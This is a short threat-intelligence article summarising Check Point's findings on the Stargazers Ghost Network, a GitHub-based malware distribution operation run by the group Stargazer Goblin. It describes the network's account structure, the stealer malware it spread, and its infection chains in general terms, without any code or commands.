Stargazer Goblin’s Use of GitHub for Malware Distribution

In July 2024, the 'Stargazers Ghost Network,' a complex malware distribution network, was identified and assessed by Check Point researchers to be operated by a threat group tracked as Stargazer Goblin. This network utilizes a resilient and effective system of GitHub accounts to distribute malware and malicious links through an organized series of repositories. The network functions as a Distribution as a Service (DaaS), allowing threat actors to share and distribute malicious links and malware. Stargazer Goblin has structured these accounts to engage in activities such as starring, forking, and subscribing to malicious repositories, making them appear legitimate. According to Check Point, "These types of attacks do not aim to lure users into directly downloading and executing payloads from the repository itself. Instead, they often involve scripts that download and execute payloads from seemingly legitimate websites or sources."

The Stargazers Ghost Network is extensive, with over 3,000 active "ghost" accounts involved, potentially bolstered by compromised accounts. The network's operators have distributed various types of information-stealing malware, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine. This operation was traced back to August 2022 based on researchers' examination of "some core accounts," with a considerable amount of profits having been generated by the threat actors, estimated at approximately $100,000 over its lifespan. Adding to the legitimacy and traffic to the repositories, tags are used to draw users with specific interests, such as games. The accounts are structured to distribute responsibilities, ensuring flexibility and minimizing disruptions when parts of the network are compromised. As Check Point Research explains, "By distributing responsibilities across multiple accounts, the network ensures flexibility in replacing its compromised components. This minimizes disruption to their operations, allowing them to swiftly adapt and continue their malicious activities on GitHub."

Campaigns orchestrated by the group have achieved a significant impact. During one campaign, "in less than 4 days, more than 1,300 victims were infected with Atlantida Stealer." Analysis of an infection chain for an Atlantida campaign showed that it was initiated by distributing a GitHub link, potentially via Discord, leveraging compromised WordPress sites. The infection chain started with a download link contacting a PHP file (index.php) that then downloaded an HTA file with an embedded VBScript. The VBScript called PowerShell cmdlets irm (Invoke-RestMethod) and iex (Invoke-Expression) to execute remote code, ultimately injecting malicious code into regasm.exe to drop the Atlantida Stealer, which siphoned data from the victim's system. Another campaign, the distribution of Rhadamanthys malware, involved rar password-protected archives containing an executable and a .cmd file. These files were used to infect the victims' systems, showcasing the range of methods employed by Stargazer Goblin to deliver malware. Both campaigns illustrate the network's ability to adapt and utilize various techniques to distribute malicious content effectively.

Check Point Research suggests that the Stargazers Ghost Network is part of a larger Distribution as a Service universe, with similar operations likely occurring on other platforms like YouTube. The group behind this network, Stargazer Goblin, has demonstrated a sophisticated approach to malware distribution, leveraging legitimate platforms like GitHub to maintain the appearance of legitimacy. GitHub has taken down over 1,500 malicious repositories since May 2024, but more than 200 are still active, indicating the resilience and scale of the network. Users should exercise caution with file downloads and URLs, especially those leading to password-protected archives.